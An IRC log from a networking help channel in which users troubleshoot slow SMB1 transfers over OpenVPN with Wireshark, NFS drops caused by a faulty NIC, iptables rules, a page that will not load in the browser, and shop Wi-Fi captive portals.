20:05 < xtrWrithe> purplex88: as long as you have an IP address asigned on that stack you will be exposed on the network it belongs
20:05 < varesa> it is not that hard to try *every* address
20:05 < purplex88> but how will they connect if theres no app to connect on my computer?
20:06 < xtrWrithe> purplex88: Layer 4 Transport
20:06 < varesa> unless you've firewalled it the OS will by default respond to things like ICMP (for example ping requests)
20:06 < xtrWrithe> purplex88: purplex88 what do you call APP?
20:06 < purplex88> is there an OS built in function which allows connection?
20:06 < varesa> depending on the OS but usually yes, possibly even multiple
20:07 < purplex88> windows 8.1
20:07 < xtrWrithe> purplex88: is called TCP/IP
20:07 < varesa> you really also need to define "make a connection" for us to really get anywhere
20:07 < xtrWrithe> purplex88: https://en.wikipedia.org/wiki/OSI_model
20:07 < DoctorDick> Or it might be easier to tell us what you're trying to accomplish
20:07 < purplex88> well..
20:08 < xtrWrithe> purplex88: sounds like you are just asking randomly, first time on computers?
20:08 < purplex88> say someone plugs their ethernet to my computer
20:08 < purplex88> can they access everything?
20:08 < xtrWrithe> purplex88: yes
20:08 < purplex88> or say a connection via. wifi
20:09 < xtrWrithe> purplex88: lot of differents vectors but yes at the end
20:09 < varesa> it is one thing to make some low level connection and another thing to get your computer to really do anything useful other than respond "f**** off" and close the connection
20:09 < xtrWrithe> same with wifi
20:09 < varesa> if your system is configured and firewalled properly, they can't access anything
20:09 < varesa> at most they will know that there is a system there but it'll refuse to do anything
20:10 < purplex88> which app or service on my OS will allow this connection to happen?
20:10 < purplex88> is it simply lan network adapter?
20:10 < varesa> I have no idea what numerous things windows runs by default
20:10 < purplex88> i'll disable it
20:10 < varesa> and don't have a machine to test with here
20:11 < varesa> yes, if you disable the network you'll not have issues from people connecting over the network :)
20:11 < kuahara> procmon seems entirely useless in trying to figure out what is going on here
20:11 < varesa> unless they find some fault in the NIC firmware or something like Intel ME and take over the hardware and from there the system anyway
20:11 < purplex88> hm..
20:16 < purplex88> sounds simple
20:16 < purplex88> its simply a LAN network
20:30 < HrStiefel> someone who works with palo alto networks?
20:32 < varesa> I've touched their stuff once or twice
20:32 < varesa> can't say I really know 'em though
20:35 < HrStiefel> varesa: i have a problem with decryption and skype for business traffic
20:36 < varesa> HrStiefel: sounds like it goes above my knowledge :)
20:36 < varesa> Is the issue with it not being decrypted or skype not working once decrypted?
20:37 < varesa> Could be that skype only trusts the real Microsoft CA to prevent MITM
20:38 < HrStiefel> skype does not work once decrypted
20:39 < wind_swept> what's a worrisome broadcast pps in a /16 vlan ?
20:41 < HrStiefel> i want to exclude that specific traffic, but i can not do it
20:42 < kuahara> ok, so I think qman__ was correct
20:42 < kuahara> I did a wireshark capture on my openvpn interface just now and when I tried to view the image we've been having trouble with, 90% of the entries that showed up are SMB
20:43 < kuahara> when I click one that works fine, 90% or more of the entries are TCP with a few SMB entries mixed in.
20:49 < hex9> is there good way to have open wifi and startup page to have your commercial
20:49 < S_SubZero> Has anyone really been far as decided to use even go want to do look more like?
20:51 < hex9> sort of like wifi garden.. but they all want $
20:55 < kuahara> hex9, you talking about signing into your wifi via facebook or something like that?
20:56 < mead> rofl, I get some DECA units from directv for free, but they don't send any RF to DC adapters... I can almost hear the At&t executibves laughing at me
21:00 < hex9> kuahara just like a little pop up
21:00 < hex9> when they enter a store so it shows up a book thats on sale
21:00 < hex9> once they connect on our public wifi basically just little pop-up
21:02 < detha> I would certainly hope that is not possible
21:03 < DoctorDick> hex9, So a captive portal?
21:08 < hex9> DoctorDick apperantly it is.. with wifi garden tho but u pay for it
21:08 < hex9> but you have to use their DNS
21:11 < detha> if all you want is a captive portal that releases after time, easy enough - there are some free ones you could probably hack to do that
21:14 < kuahara> I hate the idea of helping anyone wanting to make use of a pop up.
21:14 < kuahara> an unrequested pop up*
21:16 < Apachez> pop pop the jam
21:16 < Apachez> pop it up
21:16 < hex9> its when they try to use the internet
21:16 < hex9> the browser page would be our logo first why not
21:17 < kuahara> even if there are terms and conditions that need to be accepted, I'd propose redirecting them to the page they originally requested as soon as they click the accept button
21:18 < detha> hex9: because annoyance. That would be enough to make me walk straight out of the shop
21:18 < kuahara> not redirecting them to a company page with an ad on it and forcing them to submit their request a 2nd time
21:18 < kuahara> yep.
21:21 < kuahara> That reminds of of this seriously annoying thing happening on the S8+ now where when I submit a request for  page or web based service and the phone immediately switched me over to the wifi login screen instead, prompting me to log into some network I don't have the password for
21:21 < kuahara> shit drives me crazy.  I wind up disabling wifi on the spot and going back to whatever I was doing.  It does this even when 4G/LTE is in great shape.
21:22 < kuahara> Even if wifi is my preferred way to connect, it should only ever try to use it with networks I'm already signed into.
21:30 < hex9> kuahara well many offer it.. but you have to accept the terms.. watch an ad in return perhaps and so on
21:31 < kuahara> yea, I'd nope right out of that
21:31 < kuahara> ok, so on an unrelated note (my original question)_
21:32 < kuahara> This guy explains exactly the problem I am having:   https://blogs.technet.microsoft.com/nettracer/2010/08/11/effects-of-incorrect-qos-policies-a-story-behind-a-slow-file-copy/
21:33 < kuahara> When I watch a wireshark trace of our document viewer requesting this file,  and look at all the TCP lines, there's a .4 second delay on every single one of them
21:33 < kuahara> actually, the delay grows longer and longer with each subsequent entry
21:34 < muffinman8> Hello. Why/how would would a default drop policy on an output chain prevent python from accessing the kernal?
21:34 < admiralspark> kuahara:
21:34 < admiralspark> so
21:34 < admiralspark> SMB? I assume?
21:34 < BenderRodriguez> muffinman8: ##linux
21:34 < BenderRodriguez> I'm assuming you're talking about iptables.
21:35 < kuahara> I think so.  I think I am reading the trace incorrectly though.  I don't know how to change my output to match the format of his
21:35 < admiralspark> muffinman8: complicated subject, has to do with how networking even locally goes through iptables
21:36 < muffinman8> @benderrodriguez yeah I posted in there as well
21:36 < admiralspark> kuahara: no, if it's SMB, that's exactly how it behaves when it receives too many retransmits
21:36 < admiralspark> it slows the request rates
21:36 < admiralspark> by an increment each time
21:36 < admiralspark> remember, QoS is choosing what traffic you don't care about, not prioritization of certain types of traffic
21:37 < muffinman8> @admiralspark I allowed loopback and established connections though...
21:37 < kuahara> I am letting the tracer run again from the start (when I click the view button) to finish (when the image finishes loading)
21:37 < kuahara> I may need some help with this.
21:37 < admiralspark> muffinman8: can you pastebin your iptables rules?
21:37 < kuahara> There's like 10 zillion SMB 1141 Read Andx response, 1024 bytes lines.
21:38 < kuahara> it gets page 1 of 2, then seems to repeat the process and eventually loads the 2nd page.
21:38 < admiralspark> kuahara: there's always the potential that it's something else too, like bad mtu negotiations :P
21:38 < kuahara> we went down the MTU road earlier
21:38 < kuahara> even when I lowered MTU to 1200 on the client machine on just the vpn adapter, the problem persisted
21:39 < kuahara> I don't know if that rules out MTU or not, but I tested on the command line and it was succeeding at like 1272
21:39 < admiralspark> can you view the switch/router qos queues at time of copy?
21:39 < muffinman8> @admiralspark yeah let me see if I can make one
21:39 < kuahara> I changed openvpn versions and it succeeds at 1472
21:39 < admiralspark> jesus, 12xx is low
21:39 < admiralspark> muffinman8: http://ix.io/
21:39 < kuahara> yea, I think there was something wrong with the .ovpn file being used with the latest version of openvpn.  not sure.
21:39 < admiralspark> ^^
21:40 < admiralspark> thats something I've seen before, bad adapter settings in the ovpn file
21:40 < kuahara> now I just need someone who knows how to properly read these wireshark logs
21:40 < admiralspark> iirc it had something to do with the encryption scheme set
21:42 < kuahara> where can I look to see if a delay is being added?
21:43 < admiralspark> kuahara: kernel-level polling of the OS?
21:43 < admiralspark> :P
21:43 < admiralspark> just look at the SMB traffic flows
21:43 < admiralspark> in a netflow monitor
21:43 < admiralspark> that'll show you graphically if it's dropping
21:43 < kuahara> is that something within wireshark?
21:44 < admiralspark> do you have retransmits?
21:44 < admiralspark> no....
21:44 < admiralspark> you'd use a netflow monitor to see it
21:44 < admiralspark> I'm assuming now you don't have one :P
21:44 < admiralspark> can you paste the pcap somewhere? I can look @ it for you
21:45 < admiralspark> kuahara: http://www.lovemytool.com/blog/2017/09/troubleshooting-smb-connection-issue-using-wireshark-by-tony-fortunato.html
21:45 < kuahara> I think this contains just about everything you'd need to wipe out data for multiple cloud customers
21:45 < admiralspark> kuahara: https://osqa-ask.wireshark.org/questions/4472/help-smb-troubleshooting
21:45 < admiralspark> hahaha
21:45 < admiralspark> ahhhhh
21:45 < admiralspark> yeah, time to google then :P
21:46 < admiralspark> that second link has some good stuff to look for
21:48 < kuahara> looking at it now
21:48 < kuahara> if my damn phone will stop ringing
21:49 < muffinman8> @admiralspark I cant even access pastebin or git hub. Yet I can browse the internet fine.... Does github run on a port other than 80 or 443?
21:51 < Casper> Hi, does the newer linux kernel have something about route advertising and discovering? I have 2 nics in my pc and nas, the gbit (192.168.0.0/16) is basically the internet connection, and the 10gbe (10.0.0.0/24) is a direct link to the nas. I get some very weird issue with NFS and even ssh
21:52 < admiralspark> muffinman8: nope
21:52 < Casper> like, earlier, I had 2 ssh session to the nas, one was active, and one died. trying to ssh back I got the no route to host   o.O
21:52 < admiralspark> that would be your web filter/firewall prolly
21:52 < Casper> also, nfs was 'paused'
21:52 < admiralspark> Casper: sounds like you have bad routing?
21:53 < tds> muffinman8: what sites are you able to reach?
21:53 < Casper> usual setup is the 10gbe for nfs, but I had issue so I mounted throught the gbit instead... and both ssh was on the gbe instead too...
21:53 < tds> both github and pastebin are ipv4-only
21:53 < Casper> admiralspark: that is why I'm asking, I did not touched the route
21:54 < kuahara> admiralspark  when I put smb.cmd == 0x72 into the filter on the trace, nothing shows up in the results.  Same when I clear it and filter on:  smb.dialect.index == 5
21:54 < kuahara> Does this mean that it is trying to use something other than SMB1?
21:55 < kuahara> That Buffal Terastation only supports SMB1
21:55 < Casper> so I need to fix this like now, I have 1 hour to fix it...
21:55 < admiralspark> kuahara: to confirm, you ARE using smb right?
21:55 < admiralspark> Casper: you need to have routes
21:55 < admiralspark> can you even ping the devices you're connecting to?
21:55 < kuahara> Yes, unfortunately, any connecting clients mapping a drive to the share on that terastation have to have SMB1 enabled or they can't map it.
21:55 < admiralspark> Casper: your machine is now a router
21:56 < Casper> admiralspark: there is routes
21:56 < kuahara> then the software requests the image via  j:\path-to-file
21:56 < muffinman8> @tds everything fine youtube, reddit, you name it. However never git hub. Disabled noscript. Also disabled https everywhere. Still no luck
21:56 < admiralspark> kuahara: there's so much wrong with that I don't know where to begin :P so what does the protocol field say on that wireshark trace?
21:57 < kuahara> admiralspark we'd be reliving a conversation I had yesterday.  I am vehemently opposed to the way our company does things, but can't change it.
21:57 < Casper> admiralspark: is there anything like route autodiscovery now?
21:57 < admiralspark> Casper: and you can confirm connectivity via, say, ping?
21:57 < Casper> yes
21:57 < Casper> can ping
21:57 < admiralspark> kuahara: haha no I know how it is
21:57 < kuahara> I found mentions of SMB2 in the raw text when I follow the TCP stream, but not sure how to find out what the agreed upon protocol was
21:57 < admiralspark> Casper: reset your NFS stuff then?
21:57 < Casper> and not only ping, but ssh
21:57 < Casper> both server and client has been reboted
21:58 < admiralspark> kuahara: I suspect that was jsut negotiations. I assume your terrastation didnt happen to get WUpdates?
21:58 < admiralspark> Casper: then what's the issue?
21:58 < admiralspark> you said you couldn't do that before and now you can
21:58 < admiralspark> sounds fixed :)
21:58 < kuahara> I doubt it is ever permitted updates of any kind
21:59 < admiralspark> kuahara: it doesn't matter whast you allow or don't on WSUS, windows security updates are pushed out-of-band now and disabling SMB1 happened this spring
21:59 < admiralspark> we had a machine finally get it a week ago
21:59 < kuahara> the terastation is not a windows machine
21:59 < kuahara> It's a Buffalo Nas device
21:59 < admiralspark> It's a buffalo terastation is it not
21:59 < admiralspark> yeah
21:59 < kuahara> yea
21:59 < admiralspark> You're telling me you're running the buffalo OS thing on it?
22:00 < kuahara> I imagine so.  I didn't set it up and don't have the login for it.
22:00 < kuahara> I know I can pull up the login screen, just don't have credentials for it.
22:00 < Casper> admiralspark: it used to work fine, then I started to have NFS to stop working, as in it mount, it transfert then the speed drop to basically zero. but then it resume, or not... I tought of an hardware failure, so I remounted via the other nic, which give me 1/10 of the speed but hey atleast it worked
22:00 < kuahara> in other words, I know it's running.
22:00 < Casper> until today, where it did the same
22:00 < kuahara> whether they use it or not.
22:00 < admiralspark> TBH I've only ever worked with Terastations running 2008r2 and newer
22:01 < admiralspark> Id' double check it's not running wserver
22:01 < admiralspark> Casper: there's a million things that could be wrong. I'd start looking at logs. Could be l2, l3, l7
22:02 < Casper> admiralspark: beside dmesg, I don't think there is anything else
22:02 < Casper> and dmesg say: nfs not responding  then server ok...
22:02 < kuahara> admiralspark  If I try to do something like   net use j: \\server_ip\share pass /user:user   from a windows 10 machine that doesn't specifically have SMB1 enabled in Windows features, I'll get an error message that tells me I cannot map the drive because it requires SMB1.
22:03 < kuahara> In the latest versions of Win10, SMB1 is turned off by default
22:03 < kuahara> Also, I called Buffalo directly to see if there was different firmware we could use that would enable us to use SMB2+ instead.  They said no, there was no such firmware for that model terastation.
22:03 < kuahara> and it wouldn't be getting further updates to support it either.
22:04 < admiralspark> kuahara: right. But. It's a NAS. Server. You can install a different OS
22:04 < admiralspark> most people run a full server for that specific reason
22:04 < admiralspark> anyway
22:04 < admiralspark> I don't
22:04 < kuahara> I'll call and ask
22:04 < admiralspark> know
22:04 < admiralspark> on how to fix it
22:04 < admiralspark> :(
22:12 < kuahara> ok.. so I just talked to our CEO
22:12 < kuahara> As soon as the words SMB1 left my mouth I was hit with, "ok, stop.  Let's not go down that road again, we just spent $300,000 on new disk equipment and ...."
22:12 < tds> muffinman8: odd, reddit doesn't support v6, so it's not that
22:13 < kuahara> Anyway, I guess our VP is going to be moving stuff off that terastation at some point and onto whatever this new equipment is.
22:13 < kuahara> He's going to talk to her about moving it tonight.
22:13 < tds> muffinman8: any particular error message, do you get anything useful if you run curl -v https://reddit.com/ ?
22:13 < kuahara> But then said he really doesn't think this has anything to do with SMB1 and he knows I think it does.   I had to explain that I really don't know that it does or not, I'm just trying to troubleshoot.
22:14 < kuahara> I just hope this company I am moving off to calls soon.  Sometimes those conversations like the one I just had make me uncomfortable.
22:14 < tds> oh wait, my brain isn't working, you said reddit works so try one of the ones that was broken
22:20 <+catphish> Casper: does this happen on both networks right now?
22:20 < Casper> no
22:21 <+catphish> first thing, are both networks totally separate, unconnected from each other, and on different subnets?
22:22 <+catphish> or do they have any infrastructure in common?
22:22 < Casper> 192.168.0.0/16 dhcp 'static' 1gbit pc -> switch -> 1gbit nas      10.0.0.0/24 static 10gbe pc -> 10gbe nas
22:23 <+catphish> so there's no switch on the gigabit interface?
22:23 <+catphish> *10 gigabit
22:23 < Casper> no switch, direct
22:23 <+catphish> ok, but that connection is fine right now?
22:23 < Casper> appear to be fine atleast
22:23 <+catphish> so we can only debug the gigabit connection
22:24 < Casper> ah surprise   some message now in dmesg
22:24 <+catphish> Casper: well that's worth reading
22:24 <+catphish> seems to me like one end is just "broken" rather than misconfigured
22:24 <+catphish> but hard to guess for now
22:25 < Casper> [61933.127317] sky2 0000:07:00.0: error interrupt status=0x40000008      [61933.127716] sky2 0000:07:00.0 enp7s0: rx error, status 0x7ffc0001 length 548
22:25 < Casper> will need a reboot on that end...
22:26 <+catphish> yep that's fucked :)
22:27 <+catphish> maybe this is just bad luck, but could be all kinds of bad hardware
22:27 <+catphish> see how it does with a reboot
22:36 < kuahara> The time delta from frame to frame is 0.0000x seconds in every one of these frames.  So I don't think this is qos
22:37 < GenteelBen> WHY ARE THERE NO 5GBASE-T HOME ROUTERS
22:37 < GenteelBen> WTF
22:38 < GenteelBen> Don't seem to be any 5GbE network adapters, either.
22:38 < GenteelBen> All in all, this is a disgrace and people should be executed for getting everybody's hopes up.
22:39 < muffinman8> @tds I am not really experienced running the curl command alot but when I curl reddit I get a significant amount more information then when I curl github. I dont get any html when I curl github but I get some html when I curl reddit. Idk if that means anything
22:39 < Casper> does anyone know of a good tool to check for proper networking reliability and benchmarking?
22:39 < Casper> GenteelBen: my NIC is 5GBe capable
22:40 < tds> muffinman8: if you could stick the output of curl -v https://github.com on paste.debian.net, that would be useful
22:40 < Casper> funny enought, the nic do not support 10Mbps  :D
22:40 < kuahara> "GenteelBen you don't want 5GbE.  And you want to go back to paying a premium to watch ad littered sub prime tv at home."   -Your ISP monopoly
22:41 < Casper> 100baseT/Full 1000baseT/Full 2500baseT/Full 5000baseT/Full 10000baseT/Full
22:41 < tds> Casper: yeah, I've heard of that causing issues with new switches and ancient low bandwidth (eg out of band) gear
22:42 < bray90820> Can someone help me manually add an amb share to RuneAudio
22:42 < muffinman8> @tds just pasted it
22:43 < tds> that output looks fine, you'll need to retry it without the www though
22:43 < Casper> 10mbit is long gone anyway. so who care about that old standard, even 100mbit is meh, and you see it only on old gear, junk gear or butcherised laptop
22:43 < tds> since all that's telling you is that www.github.com redirects to github.com
22:43 < Casper> mind you, they put a gbit chip, but a 100mbit magnetics...
22:43 < tds> < HTTP/1.1 301 Moved Permanently
22:43 < tds> < Location: https://github.com/
22:47 < Casper> hmmm will have to downgrade the kernel on the nas it seems, because I get the same issue...
22:55 < Casper> hmmm  I think I have a failed board in my nas...
23:03 <+catphish> Casper: i read that as "in my ass" i think i should sleep soon
23:06 < Casper> catphish: probably I guess
23:07 < Casper> I still get some interrupt issue even with a kernel downgrade so... meh
23:07 < Casper> might be time to upgrade the hardware for a small i3 or something like that...
23:09 <+catphish> ya
23:14 < kuahara> I do a tracert to file server on the other side of the vpn connection.  It hits a 5.5.x.y address, then 192.168.249.1, then 192.168.214.14
23:15 < kuahara> wireshark shows TTL exceeded on the very first entry when I did the tracert and on all subsequent entries until the tracert finished
23:15 < muffinman8> @tds ok posted the code when I run curl on the correct url
23:16 < kuahara> is that by itself indicative of a problem?
23:16 <+catphish> kuahara: every hop should return ttl exceeded, that's how traceroute works
23:17 < tds> if you're seeing 5.5.whatever before your rfc1918 addresses in the traceroute, and you don't own that 5.5 space, then something sounds misconfigured
23:17 < tds> muffinman8: can you post the link?
23:17 <+catphish> tds: it's normal for ISPs to use RFC1918 addresses internally
23:18 < kuahara> I click the view button and during the long wait, I am seeing lots of retransmits fly by
23:18 <+catphish> i see them all the time in traceroutes, plus actually this is over a vpn so its probably all internal
23:18 < tds> catphish: oh, I meant if those rfc1918 addresses were their internal network, they were abusing the 5.5 space using it internally
23:18 <+catphish> oh i see yeah, seeing a public address there is odd
23:19 < tds> but yeah, I'd expect most vpn providers to do nat with rfc1918 or the shared address space, since v4 is expensive
23:20 < kuahara> wish I knew what I was looking at in the rest of this trace
23:20 < muffinman8> @tds the code is too long. It says it cant add my entry to the database
23:20 < muffinman8> @tds what do you suggest
23:20 < tds> I'd just post the first 50-100 lines or something
23:20 < tds> either way, if it's all html, then that sounds like it's working
23:21 <+catphish> tds: don't most people use vpn providers for the sole purpose of not having a unique IP anyway
23:21 <+catphish> NAT is a feature for once :)
23:21  * tds wonders when vpn providers are going to start nat66ing all their customers from ula space to one gua address
23:22 < muffinman8> @tds https://paste.debian.net/1030717
23:22 < tds> I've heard of some with "ipv6 leak protection", where they just push you a default route by then null route all the traffic, to avoid it leaking via your actual isp if they have v6 :/
23:22 < kuahara> wish I could buy someone reddit gold to look at this trace and not sabotage data on the servers
23:22 < tds> muffinman8: that looks fine to me
23:23 < kuahara> but it's worth more than $3
23:23 <+catphish> tds: that seems sensible enough
23:24 < muffinman8> @tds I get the green padlock with the cert of github. But all I get is a white screen
23:25 < tds> catphish: I'm sure some would argue that they should just deploy v6, but again I guess that goes against what lots of people use VPNs for
23:25 < tds> muffinman8: it might be worth checking the browser's console for anything, but if it works with curl then it sounds like it likely isn't the network ;)
23:26 < muffinman8> @tds ok firefox shouldnt be doin this...
23:26 <+catphish> tds: it's just as good if you mask the addresses somehow
23:26 < tds> yeah
--- Log closed Tue Jun 26 00:00:13 2018